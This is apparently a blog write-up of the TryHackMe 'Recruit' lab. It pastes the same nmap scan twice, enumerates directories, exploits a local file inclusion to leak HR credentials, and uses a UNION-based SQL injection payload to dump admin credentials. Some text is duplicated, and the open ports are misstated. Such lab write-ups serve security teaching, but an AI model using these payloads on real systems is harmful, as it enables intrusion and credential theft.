July 23, 2026
TryHackMe Recruit Walkthrough: Complete Web Challenge Guide and CTF Write-Up
Hey everyone! ๐ In this TryHackMe walkthrough, we will solve the Recruit challenge from TryHackMe by following a structured webโฆ

By A. AntorCSE404
6 min read
Hey everyone! ๐ In this TryHackMe walkthrough, we will solve the Recruit challenge from TryHackMe by following a structured web application penetration testing approach. We will begin with reconnaissance and enumeration to understand the target, identify exposed services and potential attack surfaces, and then analyze the web application for vulnerabilities. Finally, we will exploit the discovered weakness, gain access to the target, and retrieve the flag. ๐ฉ
Room link: https://tryhackme.com/room/recruitwebchallenge
Let's take the challenge. At first, we have to do an nmap scan to check whether any port is open that will help us to sort the challenge.
root@ip-10-49-74-208:~# nmap -sS -vv -A 10.49.154.194
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-07-23 16:52 UTC
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:52
Completed NSE at 16:52, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:52
Completed NSE at 16:52, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:52
Completed NSE at 16:52, 0.00s elapsed
Initiating Ping Scan at 16:52
Scanning 10.49.154.194 [4 ports]
Completed Ping Scan at 16:52, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:52
Completed Parallel DNS resolution of 1 host. at 16:52, 0.00s elapsed
Initiating SYN Stealth Scan at 16:52
Scanning ip-10-49-154-194.ap-south-1.compute.internal (10.49.154.194) [1000 ports]
Discovered open port 22/tcp on 10.49.154.194
Discovered open port 53/tcp on 10.49.154.194
Discovered open port 80/tcp on 10.49.154.194
Completed SYN Stealth Scan at 16:52, 0.05s elapsed (1000 total ports)
Initiating Service scan at 16:52
Scanning 3 services on ip-10-49-154-194.ap-south-1.compute.internal (10.49.154.194)
Completed Service scan at 16:52, 6.04s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against ip-10-49-154-194.ap-south-1.compute.internal (10.49.154.194)
Retrying OS detection (try #2) against ip-10-49-154-194.ap-south-1.compute.internal (10.49.154.194)
Retrying OS detection (try #3) against ip-10-49-154-194.ap-south-1.compute.internal (10.49.154.194)
Retrying OS detection (try #4) against ip-10-49-154-194.ap-south-1.compute.internal (10.49.154.194)
Retrying OS detection (try #5) against ip-10-49-154-194.ap-south-1.compute.internal (10.49.154.194)
Initiating Traceroute at 16:52
Completed Traceroute at 16:52, 0.01s elapsed
NSE: Script scanning 10.49.154.194.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:52
Completed NSE at 16:52, 8.12s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:52
Completed NSE at 16:52, 0.02s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:52
Completed NSE at 16:52, 0.00s elapsed
Nmap scan report for ip-10-49-154-194.ap-south-1.compute.internal (10.49.154.194)
Host is up, received reset ttl 64 (0.00036s latency).
Scanned at 2026-07-23 16:52:18 UTC for 25s
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7c:97:80:bc:82:37:18:89:79:62:f4:42:9a:23:98:23 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC18k57L5OL9GXveoYn/SbwS/050h0RGMoSw5ny9d0NWO/bVxXszLdhf5W0lQHXXY0c1IsVl4ntvxKEdfCEOgobzj3vQGnbXosedvPqIvKkgi3HMlrcyv7QvwP7SYzK9n2R2S2/UEgfMWz+RcdmjMMZEeOTE02LGumvNaHapdH91lPED1+PShfiLRei7VHKJOF0qr+7tsF6Irds7yytbUL3uOWvVL/+MBoNWg/94vqJQRn9cV6E5UGTiVNQOjn4oNZLiniD3L3m+fTYvxW0C4BKqjCq1SiTpGOYRh4nszk8yQ1IwnYDqAWMaztWlXx6Q8br2hYwG/UTLTHaNjRmD86hDqYHlz43bB1CDxb/b6rd/OweI08UGjUmW43OdczNgtRqiF3Zp8oJAtg4DwoY0N257zAKTt3cILwHZ8QSvd4gA3mJuKc+thWs9H9e9CLIQJvCeQfyC1GK7WElhk6FwIaYpJPymAA+4QDmA+WRT3RXtSKNlamWpD4QruwI/8Kzfw0=
| 256 c0:2f:c4:71:f0:23:16:cf:13:2d:f6:0e:63:13:00:cf (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNHvsqTB/7crNFZAQjkIslOqnVf6PichYF/ldLMg5dx93gugV3d7i9SoSSQb5GiSUucI/2TSSDOsGddWK16xLrg=
| 256 97:84:02:0f:af:95:6a:aa:77:65:e4:bb:ba:50:2a:91 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICtG5BEL51YUmqrSUMO76+AV6DFJv3V25T5BqZsaWFWk
53/tcp open domain syn-ack ttl 64 ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Recruit
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=7/23%OT=22%CT=1%CU=35774%PV=Y%DS=1%DC=T%G=Y%TM=6A62
OS:46DB%P=x86_64-pc-linux-gnu)SEQ(SP=FC%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)O
OS:PS(O1=M2301ST11NW7%O2=M2301ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%O5=M
OS:2301ST11NW7%O6=M2301ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=
OS:F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)
Uptime guess: 49.314 days (since Thu Jun 4 09:20:50 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=252 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 0.35 ms ip-10-49-154-194.ap-south-1.compute.internal (10.49.154.194)
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:52
Completed NSE at 16:52, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:52
Completed NSE at 16:52, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:52
Completed NSE at 16:52, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.24 seconds
Raw packets sent: 1124 (53.442KB) | Rcvd: 1081 (46.702KB)
root@ip-10-49-74-208:~#
root@ip-10-49-74-208:~# nmap -sS -vv -A 10.49.154.194
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-07-23 16:52 UTC
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:52
Completed NSE at 16:52, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:52
Completed NSE at 16:52, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:52
Completed NSE at 16:52, 0.00s elapsed
Initiating Ping Scan at 16:52
Scanning 10.49.154.194 [4 ports]
Completed Ping Scan at 16:52, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:52
Completed Parallel DNS resolution of 1 host. at 16:52, 0.00s elapsed
Initiating SYN Stealth Scan at 16:52
Scanning ip-10-49-154-194.ap-south-1.compute.internal (10.49.154.194) [1000 ports]
Discovered open port 22/tcp on 10.49.154.194
Discovered open port 53/tcp on 10.49.154.194
Discovered open port 80/tcp on 10.49.154.194
Completed SYN Stealth Scan at 16:52, 0.05s elapsed (1000 total ports)
Initiating Service scan at 16:52
Scanning 3 services on ip-10-49-154-194.ap-south-1.compute.internal (10.49.154.194)
Completed Service scan at 16:52, 6.04s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against ip-10-49-154-194.ap-south-1.compute.internal (10.49.154.194)
Retrying OS detection (try #2) against ip-10-49-154-194.ap-south-1.compute.internal (10.49.154.194)
Retrying OS detection (try #3) against ip-10-49-154-194.ap-south-1.compute.internal (10.49.154.194)
Retrying OS detection (try #4) against ip-10-49-154-194.ap-south-1.compute.internal (10.49.154.194)
Retrying OS detection (try #5) against ip-10-49-154-194.ap-south-1.compute.internal (10.49.154.194)
Initiating Traceroute at 16:52
Completed Traceroute at 16:52, 0.01s elapsed
NSE: Script scanning 10.49.154.194.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:52
Completed NSE at 16:52, 8.12s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:52
Completed NSE at 16:52, 0.02s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:52
Completed NSE at 16:52, 0.00s elapsed
Nmap scan report for ip-10-49-154-194.ap-south-1.compute.internal (10.49.154.194)
Host is up, received reset ttl 64 (0.00036s latency).
Scanned at 2026-07-23 16:52:18 UTC for 25s
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7c:97:80:bc:82:37:18:89:79:62:f4:42:9a:23:98:23 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC18k57L5OL9GXveoYn/SbwS/050h0RGMoSw5ny9d0NWO/bVxXszLdhf5W0lQHXXY0c1IsVl4ntvxKEdfCEOgobzj3vQGnbXosedvPqIvKkgi3HMlrcyv7QvwP7SYzK9n2R2S2/UEgfMWz+RcdmjMMZEeOTE02LGumvNaHapdH91lPED1+PShfiLRei7VHKJOF0qr+7tsF6Irds7yytbUL3uOWvVL/+MBoNWg/94vqJQRn9cV6E5UGTiVNQOjn4oNZLiniD3L3m+fTYvxW0C4BKqjCq1SiTpGOYRh4nszk8yQ1IwnYDqAWMaztWlXx6Q8br2hYwG/UTLTHaNjRmD86hDqYHlz43bB1CDxb/b6rd/OweI08UGjUmW43OdczNgtRqiF3Zp8oJAtg4DwoY0N257zAKTt3cILwHZ8QSvd4gA3mJuKc+thWs9H9e9CLIQJvCeQfyC1GK7WElhk6FwIaYpJPymAA+4QDmA+WRT3RXtSKNlamWpD4QruwI/8Kzfw0=
| 256 c0:2f:c4:71:f0:23:16:cf:13:2d:f6:0e:63:13:00:cf (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNHvsqTB/7crNFZAQjkIslOqnVf6PichYF/ldLMg5dx93gugV3d7i9SoSSQb5GiSUucI/2TSSDOsGddWK16xLrg=
| 256 97:84:02:0f:af:95:6a:aa:77:65:e4:bb:ba:50:2a:91 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICtG5BEL51YUmqrSUMO76+AV6DFJv3V25T5BqZsaWFWk
53/tcp open domain syn-ack ttl 64 ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Recruit
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=7/23%OT=22%CT=1%CU=35774%PV=Y%DS=1%DC=T%G=Y%TM=6A62
OS:46DB%P=x86_64-pc-linux-gnu)SEQ(SP=FC%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)O
OS:PS(O1=M2301ST11NW7%O2=M2301ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%O5=M
OS:2301ST11NW7%O6=M2301ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=
OS:F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)
Uptime guess: 49.314 days (since Thu Jun 4 09:20:50 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=252 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 0.35 ms ip-10-49-154-194.ap-south-1.compute.internal (10.49.154.194)
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:52
Completed NSE at 16:52, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:52
Completed NSE at 16:52, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:52
Completed NSE at 16:52, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.24 seconds
Raw packets sent: 1124 (53.442KB) | Rcvd: 1081 (46.702KB)
root@ip-10-49-74-208:~#
After scanning, we have seen 3 ports are open. Those are ports 20, 53, and 80.
Now, we modify it /etc/hosts to map the CTF domain name to the target machine's IP address so we can access the challenge using its domain name.
Now, verify if it is working perfectly.
Now navigate the domain in your browser.
Now check by guessing the username admin:admin, admin:password, etc., but failed to log in.
In this phrase, we should try to find out to see what the available directories are. For my case, I will do it using Gobuster.
We have found 4 directories:
1. mail
2. assets
3. phpadmin
4. server-status1. mail
2. assets
3. phpadmin
4. server-statusNow, check the directory mail by using this URL: http://target.thm/mail/
Now we confirmed that administrator credentials are stored inside the backend database. Now we know that the credentials we need are in a config.php file, and the administrator credentials are stored in the database.
Now look carefully this page
We clearly see an option named "Access API." Click the option and check what is going on in there.
These are all in there. We are quite interested in the Second questions "How can I fetch a candidate CV using the API" ?
Now we will use the second question clue to retrieve something interesting. That's why we browse the URL: http://target.thm/file.php?cv=config.php
So, it's saying only local files are allowed. So, we have to try bypassing potentials, as this helps in bypassing basic security filters that only check for "dots and slashes" (../) but ignore protocols so we are able to perform local file inclusion.
Finally, we have gotten the HR credential. Let's try to log in by the credentials of HR, where the username is "hr" and the password is "hrpassword123."
After logging in, we have found our first flag: THM{**}.**
Privilege escalation:
Currently, we are logged in as a normal user. Now we have to try to log in as an admin to get the second credential. Looked carefully, when we have logged in as hr a search bar option has been given below. I have a trick to get what kind of error the database will show when we try an invalid syntax. For my case I have used
''Output after clicking search:
SQL Error:
You have an error in your SQL syntax near '%'' at line 1SQL Error:
You have an error in your SQL syntax near '%'' at line 1This confirmed SQL injection. Based on the error pattern, the query likely looked like:
'%searching word%''%searching word%'Now, I will use a UNION-based payload after this confirmation
%' UNION SELECT 1,username,password,4 FROM users-- -%' UNION SELECT 1,username,password,4 FROM users-- -
http://target.thm/dashboard.php?search=%10'+UNION SELECT 1,username,password,4 FROM users-- -http://target.thm/dashboard.php?search=%10'+UNION SELECT 1,username,password,4 FROM users-- -We have found logged-in credentials of admin. Let's try to log in as an admin.
Submit the second flag and earn points for this room.
If you enjoyed this write-up, consider following me (A. AntorCSE404) for more CTF challenges, and feel free to leave feedback โ I'd love to learn and improve!